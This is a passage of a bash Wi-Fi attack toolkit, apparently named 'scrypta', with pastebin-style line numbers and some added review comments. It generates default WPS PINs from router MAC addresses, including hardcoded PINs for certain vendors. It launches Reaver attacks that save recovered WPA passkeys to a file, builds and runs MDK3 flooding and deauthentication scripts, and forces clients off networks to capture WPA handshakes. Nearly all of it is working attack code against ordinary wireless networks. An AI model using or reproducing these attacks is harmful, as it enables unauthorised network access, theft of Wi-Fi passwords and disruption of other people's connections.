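    # expr treated PIN as decimal even with leading zeros; 10# keeps that
    # meaning under shell arithmetic, where a leading 0 would mean octal.
    pin=$(( 10#$PIN ))

    # First pass: the seven leading digits only (10^7 down to 10^1).
    ACCUM=0
    weight=3
    for (( divisor = 10000000; divisor >= 10; divisor /= 10 )); do
      ACCUM=$(( ACCUM + weight * ((pin / divisor) % 10) ))
      weight=$(( 4 - weight ))   # alternate 3 -> 1 -> 3 ...
    done

    DIGIT=$(( ACCUM % 10 ))
    CHECKSUM=$(( (10 - DIGIT) % 10 ))
    PIN=$(( pin + CHECKSUM ))

    # Second pass: all eight digits, including the freshly added check digit.
    ACCUM=0
    weight=3
    for (( divisor = 10000000; divisor >= 1; divisor /= 10 )); do
      ACCUM=$(( ACCUM + weight * ((PIN / divisor) % 10) ))
      weight=$(( 4 - weight ))
    done

    RESTE=$(( ACCUM % 10 ))
  }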
  1925.  
  1926. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
  1927.  
  1928. FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
  1929.  
  1930. MAC=$(echo $FINBSSID | tr -d ':')
  1931.  
  1932. CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
  1933.  
  1934. FINESSID=$(echo $ESSID | cut -d '-' -f2)
  1935.  
  1936. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
  1937.  
  1938. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
  1939.  
  1940. MACESSID=$(echo $PAREMAC$FINESSID)
  1941.  
  1942. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
  1943.  
  1944. PIN=`expr 10 '*' $STRING`
  1945.  
  1946. FUNC_CHECKSUM
  1947.  
  1948. PINWPS1=$(printf '%08d\n' $PIN)
  1949.  
  1950. STRING2=`expr $STRING '+' 8`
  1951. PIN=`expr 10 '*' $STRING2`
  1952.  
  1953. FUNC_CHECKSUM
  1954.  
  1955. PINWPS2=$(printf '%08d\n' $PIN)
  1956.  
  1957. STRING3=`expr $STRING '+' 14`
  1958. PIN=`expr 10 '*' $STRING3`
  1959.  
  1960. FUNC_CHECKSUM
  1961.  
  1962. PINWPS3=$(printf '%08d\n' $PIN)
  1963.  
  1964. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&  [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&  [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
  1965.  
  1966. then
  1967.  
  1968. CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
  1969.  
  1970. RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
  1971.  
  1972. STRING4=`expr $RAIZ '+' 7`
  1973.  
  1974. PIN=`expr 10 '*' $STRING4`
  1975.  
  1976. FUNC_CHECKSUM
  1977.  
  1978. PINWPS4=$(printf '%08d\n' $PIN)
  1979.  
  1980. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4  "
  1981. PIN4REAVER=$PINWPS4
  1982. else
  1983. case $CHECKBSSID in
  1984. 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
  1985. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1  
  1986. $RED"Other Possible Pin"$RED:$STAND $PINWPS2  
  1987. $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
  1988. PIN4REAVER=$PINWPS1
  1989. ;;
  1990. 001915)
  1991. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  1992. PIN4REAVER=12345670
  1993. ;;
  1994. 404A03)
  1995. echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
  1996. PIN4REAVER=11866428
  1997. ;;
  1998. F43E61 | 001FA4)
  1999. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  2000. PIN4REAVER=12345670
  2001. ;;
  2002. 001A2B)
  2003. if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  2004. then
  2005. echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
  2006. PIN4REAVER=88478760
  2007. else
  2008. echo -e "PIN POSSIBLE... > $PINWPS1"
  2009. PIN4REAVER=$PINWPS1
  2010. fi
  2011. ;;
  2012. 3872C0)
  2013. if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  2014. then
  2015. echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
  2016. PIN4REAVER=18836486
  2017. else
  2018. echo -e "PIN POSSIBLE    > $PINWPS1"
  2019. PIN4REAVER=$PINWPS1
  2020. fi
  2021. ;;
  2022. FCF528)
  2023. echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
  2024. PIN4REAVER= 20329761
  2025. ;;
  2026. 3039F2)
  2027. echo -e "several possible PINs, ranked in order>  
  2028.  16538061 16702738 18355604 88202907 73767053 43297917"
  2029. PIN4REAVER=16538061
  2030. ;;
  2031. A4526F)
  2032. echo -e "several possible PINs, ranked in order>  
  2033.  16538061 88202907 73767053 16702738 43297917 18355604 "
  2034. PIN4REAVER=16538061
  2035. ;;
  2036. 74888B)
  2037. echo -e "several possible PINs, ranked in order>  
  2038.  43297917 73767053 88202907 16538061 16702738 18355604"
  2039. PIN4REAVER=43297917
  2040. ;;
  2041. DC0B1A)
  2042. echo -e "several possible PINs, ranked in order>  
  2043.  16538061 16702738 18355604 88202907 73767053 43297917"
  2044. PIN4REAVER=16538061
  2045. ;;
  2046. 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
  2047. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
  2048. PIN4REAVER=$PINWPS1
  2049. ;;
  2050. 002275)
  2051. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2052. PIN4REAVER=$PINWPS1
  2053. ;;
  2054. 08863B)
  2055. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2056. PIN4REAVER=$PINWPS1
  2057. ;;
  2058. 001CDF)
  2059. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2060. PIN4REAVER=$PINWPS1
  2061. ;;
  2062. 00A026)
  2063. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2064. PIN4REAVER=$PINWPS1
  2065. ;;
  2066. 5057F0)
  2067. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2068. PIN4REAVER=$PINWPS1
  2069. ;;
  2070. C83A35 | 00B00C | 081075)
  2071. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2072. PIN4REAVER=$PINWPS1
  2073. ;;
  2074. E47CF9 | 801F02)
  2075. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2076. PIN4REAVER=$PINWPS1
  2077. ;;
  2078. 0022F7)
  2079. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2080. PIN4REAVER=$PINWPS1
  2081. ;;
  2082. *)
  2083. echo -e $RED"Other Possible Pin$RED:$STAND $PINWPS1"
  2084. PIN4REAVER=$PINWPS1
  2085. ;;
  2086. esac
  2087. fi
  2088.  
  2089. ############## End Of WPSPIN-1.3 Default Pin Generator ##############
  2090.  
  2091. echo ""
  2092. echo $RED"MAC address for$STAND mon0:"$STAND
  2093. macchanger -s mon0
  2094. sleep 4
  2095.  
  2096. ############## End Of Review Information ##############
  2097.  
  2098. ############## Start Of Scan For Clients And Store Collected MAC Addresses Option ##############
  2099. echo ""
  2100. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND  " ClientScan
  2101.  
  2102. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  2103.    xterm -geometry 111x24+650+0 -l -lf temp1.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  2104.    cat temp1.txt | tail -10 | sed 'N;$!P;$!D;$d' | sed -n '/STATION/,$p' >> ClientScan-$AP_bssid.txt
  2105.    mv ClientScan-$AP_bssid.txt $HOME/scrypta/Client_Scans/ClientScan-$AP_bssid.txt
  2106.    rm temp1.txt
  2107.    echo ""
  2108.    echo ""
  2109.    echo $RED"Collected scan data is stored in$STAND ClientScan-$AP_bssid.txt $RED Location$STAND: $HOME/scrypta/Client_Scans"
  2110.    echo ""
  2111.    read -p $GREEN"Press [Enter] to continue.$STAND"
  2112.    fi
  2113.  
  2114. if [[ $ClientScan == "N" || $ClientScan == "n" ]]; then
  2115.    echo ""
  2116.    fi
  2117. ############## End Of Scan For Clients And Store Collected MAC Addresses Option ##############
  2118.  
  2119. ############## Start Of Reaver Attacks And Store Recovered Passkey ##############
  2120.  
  2121. clear
  2122. echo $RED"Choose an attack option:"$STAND
  2123. echo $GREEN"[1]$BLUE = Reaver + Auto Generated WPS Pin"$STAND
  2124. echo $GREEN"[2]$BLUE = Reaver (Customisable Options)"$STAND
  2125. echo
  2126. read -s -n1 -p $GREEN"Please choose an option?$STAND: " yourch
  2127. echo
  2128. case $yourch in
  2129.  
  2130. 1)
  2131. clear
  2132. echo $RED"Choose a pin:"
  2133. echo $GREEN"[1]$BLUE WPS Pin1 = $WPSpin1"
  2134. echo $GREEN"[2]$BLUE WPS Pin2 = $WPSpin2"
  2135. echo $GREEN"[3]$BLUE EasyBox Pin = $easybox"
  2136. echo $GREEN"[4]$BLUE Other Pins = $PIN4REAVER"
  2137. read -s -n1 -p $GREEN"Please choose 1, 2, 3, or 4?$STAND: " PinOption
  2138.  
  2139. if [[ $PinOption == "1" ]]; then
  2140.    clear
  2141.    echo $RED"Reaver Attack Command:"$STAND
  2142.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv"
  2143.    echo ""
  2144.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2145.    clear
  2146.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2147.    rm reaver.txt
  2148.    echo ""
  2149.    fi
  2150.  
  2151. if [[ $PinOption == "2" ]]; then
  2152.    clear
  2153.    echo $RED"Reaver Attack Command:"$STAND
  2154.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv"
  2155.    echo ""
  2156.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2157.    clear
  2158.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2159.    rm reaver.txt
  2160.    echo ""
  2161.    fi
  2162.  
  2163. if [[ $PinOption == "3" ]]; then
  2164.    clear
  2165.    echo $RED"Reaver Attack Command:"$STAND
  2166.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv"
  2167.    echo ""
  2168.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2169.    clear
  2170.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2171.    rm reaver.txt
  2172.    echo ""
  2173.    fi
  2174.  
  2175. if [[ $PinOption == "4" ]]; then
  2176.    clear
  2177.    echo $RED"Reaver Attack Command:"$STAND
  2178.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv"
  2179.    echo ""
  2180.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2181.    clear
  2182.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2183.    rm reaver.txt
  2184.    echo ""
  2185.    fi ;;
  2186.  
  2187. 2)
  2188. clear
  2189. echo $RED"Current Reaver Attack Command:"$STAND
  2190. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  2191. echo ""
  2192. read -p $GREEN"Please input any additional reaver options (eg: -vv):$STAND " ReaverOptions
  2193. echo ""
  2194. echo $RED"New Reaver Attack Command:"$STAND
  2195. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  2196. echo ""
  2197. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2198. reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2199. rm reaver.txt
  2200.  
  2201. ################## START OF: MDK3 ACCESS POINT RESET ############################################
  2202.  
  2203. echo ""
  2204. echo ""
  2205. echo $GREEN"Would you like to try to reset the access point? Y/n"$STAND
  2206. read a
  2207. if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
  2208.  
  2209.    echo "Press the [Enter] button 3 times on the kismet screen, wait 5-10 seconds then press Ctrl+c."
  2210.    kismet ncsource=mon0:hop=true
  2211.    sleep 5
  2212.  
  2213.    echo ""
  2214.    echo $RED"Target essid:$STAND $AP_essid"
  2215.    echo ""
  2216.    read -p $GREEN"Please input the above target essid.$STAND" MDK3_Target
  2217.    echo ""
  2218.    cat $HOME/scrypta/temp/*.nettxt | sed -n "/$MDK3_Target/,/Channel/p"
  2219.  
  2220.    echo 'AP_bssid="'"$AP_bssid"'"' > MDK3_APbssid.txt
  2221.    sleep 1
  2222.    echo 'AP_channel="'"$AP_channel"'"' > MDK3_APchannel.txt
  2223.    sleep 1
  2224.    cat MDK3_APbssid.txt | sed 's/AP_bssid=//' | sed 's/"//g' > MDK3_APbssid_1.txt
  2225.    sleep 1
  2226.    cat MDK3_APchannel.txt | sed 's/AP_channel=//' | sed 's/"//g' > MDK3_APchannel_1.txt
  2227.    sleep 1
  2228.    echo $AP_bssid > Blacklist.txt
  2229.  
  2230.    echo ""
  2231.    echo $GREEN"Does the access point support WAP+TKIP?"
  2232.    echo $GREEN"[1]$BLUE = Yes."
  2233.    echo $GREEN"[2]$BLUE = No."
  2234.    echo $GREEN"1 or 2?"$STAND
  2235.    read option
  2236.  
  2237.    if [[ $option == "1" ]]; then
  2238.  
  2239.       read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND  " ClientScan
  2240.  
  2241.       if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  2242.          xterm -geometry 111x24+650+0 -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  2243.          echo ""
  2244.          echo ""
  2245.       fi
  2246.  
  2247.       echo $GREEN"Did the access point have any clients connected to it?"
  2248.       echo $GREEN"[1]$BLUE = Yes."
  2249.       echo $GREEN"[2]$BLUE = No."
  2250.       echo $GREEN"1 or 2?"$STAND
  2251.       read MDK3_ClientChoice
  2252.  
  2253.       if [[ $MDK3_ClientChoice == "1" ]]; then
  2254.  
  2255.          echo '#!/bin/bash
  2256.  
  2257. RED=$(tput setaf 1 && tput bold)
  2258. GREEN=$(tput setaf 2 && tput bold)
  2259. STAND=$(tput sgr0)
  2260.  
  2261. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2262. sleep 1
  2263. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2264. echo ""
  2265. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2266.  
  2267.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2268.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2269.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2270.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid -j" &
  2271.  
  2272. while :
  2273. do
  2274.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2275.    sleep 20
  2276.    kill `pidof airodump-ng`
  2277. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2278.  
  2279.       fi
  2280.  
  2281.       if [[ $MDK3_ClientChoice == "2" ]]; then
  2282.  
  2283.          echo '#!/bin/bash
  2284.  
  2285. RED=$(tput setaf 1 && tput bold)
  2286. GREEN=$(tput setaf 2 && tput bold)
  2287. STAND=$(tput sgr0)
  2288.  
  2289. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2290. sleep 1
  2291. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2292. echo ""
  2293. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2294.  
  2295.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2296.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2297.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2298.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid" &
  2299.  
  2300. while :
  2301. do
  2302.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2303.    sleep 20
  2304.    kill `pidof airodump-ng`
  2305. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2306.  
  2307.       fi
  2308.       fi
  2309.  
  2310.    if [[ $option == "2" ]]; then
  2311.  
  2312.    echo '#!/bin/bash
  2313.  
  2314. RED=$(tput setaf 1 && tput bold)
  2315. GREEN=$(tput setaf 2 && tput bold)
  2316. STAND=$(tput sgr0)
  2317.  
  2318. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2319. sleep 1
  2320. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2321. echo ""
  2322. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2323.  
  2324.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2325.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2326.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2327.  
  2328. while :
  2329. do
  2330.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2331.    sleep 20
  2332.    kill `pidof airodump-ng`
  2333. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2334.  
  2335.    fi
  2336.  
  2337.    sleep 1
  2338.    chmod +x $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2339.    sleep 1
  2340.    Eterm -g 100x10-640-500 --cmod "red" -T "Main Window - Press Ctrl+c to exit MDK3" -e sh -c "$HOME/scrypta/temp/MDK3_AP_Reset.sh; bash"
  2341.    rm $HOME/scrypta/temp/Blacklist.txt
  2342.  
  2343. if [[ $a == "N" || $a == "n" ]]; then
  2344.    echo ""
  2345. fi
  2346. fi
  2347. ################## END OF: MDK3 ACCESS POINT RESET ############################################
  2348.  
  2349. echo "" ;;
  2350. 0) exit 0;;
  2351. *) echo "";
  2352. echo "Press [Enter] to continue. . ." ; read ;;
  2353. esac
  2354.  
  2355. ############## End Of Reaver Attacks And Store Recovered Passkey ##############
  2356.  
  2357. ######################## LOOP ############################################
  2358.  
  2359. clear
  2360. read -s -n1 -p $RED"Choose another target or return to the main menu:$GREEN
  2361. y $BLUE= Choose another target.$GREEN
  2362. n $BLUE= Return to main menu.$GREEN
  2363. Please choose y/n?$STAND: " CONFIRM
  2364. case $CONFIRM in
  2365. n|N|NO|no|No)
  2366. break ;;
  2367. *) echo "" ;;
  2368. esac
  2369. done
  2370.  
  2371. ############## End Of Loop Section ##############
  2372.  
  2373. ############## Start Of Cleanup ##############
  2374.  
  2375. rm *.txt
  2376. rm *.py
  2377. cd
  2378. ############## End Of Cleanup ##############
  2379. ;;
  2380.  
  2381. ###### [4] Capture WPA/WPA2 Handshake ######
  2382. 4)
  # Menu option 4, part 1: scan for WPA networks, let the operator pick one by
  # number, then scan the chosen network for associated clients.
  # NOTE(review): cd is not checked; if it fails, the scan logs and temp files
  # below are written to whatever the current directory is.
  2383. cd $HOME/scrypta/temp
  2384. clear
  2385. echo $RED"Scan for possible targets."
  2386. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
  2387. read -p $GREEN"Press [Enter] to start the scan.$STAND"
  2388.  
  # xterm's -l/-lf logging writes the airodump-ng screen output to WPA_Scan.txt;
  # that log is the only input to the parsing below.
  2389. xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0
  2390.  
  # Keep the most recent AP table from the log: the lines from the last
  # 'CIPHER' header up to the 'STATION' section that contain "PSK"; rows showing
  # '<length:  0>' are dropped.
  2391. tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length:  0>/d' > temp0.txt
  # Build the numbered menu: strip a fixed-width prefix from each row, number
  # the rows, keep the number and the first remaining word (presumably the
  # ESSID), and pad single-digit numbers. This depends on airodump-ng's column
  # layout staying exactly as the author saw it.
  2392. cat temp0.txt | sed 's/^..........................................................................//' | nl -ba -w 1  -s ':  ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
  2393. sleep 1
  2394.  
  2395. PresentedAPs=$(cat PresentedAPs.txt)
  2396. sleep 1
  2397. echo ""
  2398. echo "Please choose an AP"
  2399. echo ""
  2400. echo "$PresentedAPs"
  2401. echo ""
  2402. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
  2403. echo ""
  2404.  
  # NOTE(review): $Chosen_AP is typed by the operator and lands unquoted inside
  # the sed script (the "" pairs are empty strings); anything other than a line
  # number changes what sed executes.
  2405. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
  # Whitespace-separated fields 11, 1 and 6 of the chosen row become the ESSID,
  # BSSID and channel. These values were received over the air, so they are
  # untrusted input; every later use in this branch expands them unquoted.
  2406. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $11 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2407. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2408. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2409.  
  2410. clear
  2411. echo $RED"Chosen Target Details."$STAND
  2412. echo $RED"Aceess Point essid$STAND: $AP_essid"
  2413. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
  2414. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
  2415.  
  2416. echo ""
  2417. echo $RED"Scan for clients connected to$STAND $AP_essid"
  2418. echo $RED"Once you have identified the client you wish to target press Ctrl-C to exit"$STAND
  2419. read -p $GREEN"Press [Enter] to start the scan."$STAND
  2420.  
  # Second logged scan, limited to the chosen channel and BSSID; its log
  # (WPA_ClientScan.txt) is what the client menu is parsed from.
  2421. xterm -geometry 100x20+650+0 -l -lf WPA_ClientScan.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  2422.  
  # Menu option 4, part 2: client selection and de-authentication loop. It
  # repeats until the operator answers n/N/NO/no/No at the final prompt.
  # Defensive note: the frames sent by options 1 and 2 are forged
  # de-authentication frames. Networks with 802.11w (Protected Management
  # Frames) enabled are designed to reject them, and bursts of such frames are
  # a common wireless-IDS signal.
  2423. while true
  2424. do
  2425.  
  # Take the last table from the client-scan log and keep the second field of
  # each row (presumably the client MAC); the first six lines and the last line
  # of that table are discarded.
  2426. tac WPA_ClientScan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -r -e 's/\./ /' | sed '$d' | sed '1,6d' | awk '{ print $2 }' > temp1.txt
  2427. cat temp1.txt | nl -ba -w 1  -s ': ' > ConnectedClientsScan.txt
  2428. ConnectedClientsScan=$(cat ConnectedClientsScan.txt)
  2429.  
  2430. sleep 2
  2431. echo ""
  2432. echo $RED"Please choose a client MAC address"$STAND
  2433. echo ""
  2434. echo "$ConnectedClientsScan"
  2435. echo ""
  2436. read -p $GREEN"Please input the number of your chosen client MAC address:$STAND " Chosen_Client
  2437. echo ""
  2438.  
  2439. sleep 1
  # NOTE(review): operator input is placed unquoted into the sed script here.
  2440. Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
  2441. echo ""
  2442. echo $RED"Chosen Client MAC Address."$STAND
  2443. echo "$Chosen_Client_MAC"
  2444. echo ""
  2445.  
  # Background capture writing files with the "psk" prefix. A new window is
  # started on every pass through the loop and nothing inside the loop stops
  # the previous one.
  2446. xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --ignore-negative-one -w psk --bssid $AP_bssid mon0" &
  2447.  
  2448. echo $RED"Choose an option:"
  2449. echo $GREEN"[1]$BLUE = De-Authenticate The Chosen Client?."
  2450. echo $GREEN"[2]$BLUE = De-Authenticate All Connected Clients?."
  2451. echo $GREEN"[3]$BLUE = Choose another client."
  2452. echo $GREEN"1, 2, or 3?"$STAND
  2453. read option
  2454.  
  # The -e argument is a single string built from values parsed out of the scan
  # logs; they are not validated before being placed in the command line.
  2455. if [[ $option == "1" ]]; then
  2456.        echo "De-Authenticate a single client."
  2457.        xterm -geometry 100x20+675+350 -e  "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid -c $Chosen_Client_MAC mon0"
  2458.        fi
  2459. if [[ $option == "2" ]]; then
  2460.        echo "De-Authenticate all connected clients."
  2461.        xterm -geometry 100x20+675+350 -e  "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid mon0"
  2462.        fi
  # Option 3 only re-reads the client choice; it sends nothing and then falls
  # through to the confirmation prompt below.
  2463. if [[ $option == "3" ]]; then
  2464.        clear
  2465. echo "Please choose a client"
  2466.        echo ""
  2467.        echo "$ConnectedClientsScan"
  2468.        echo ""
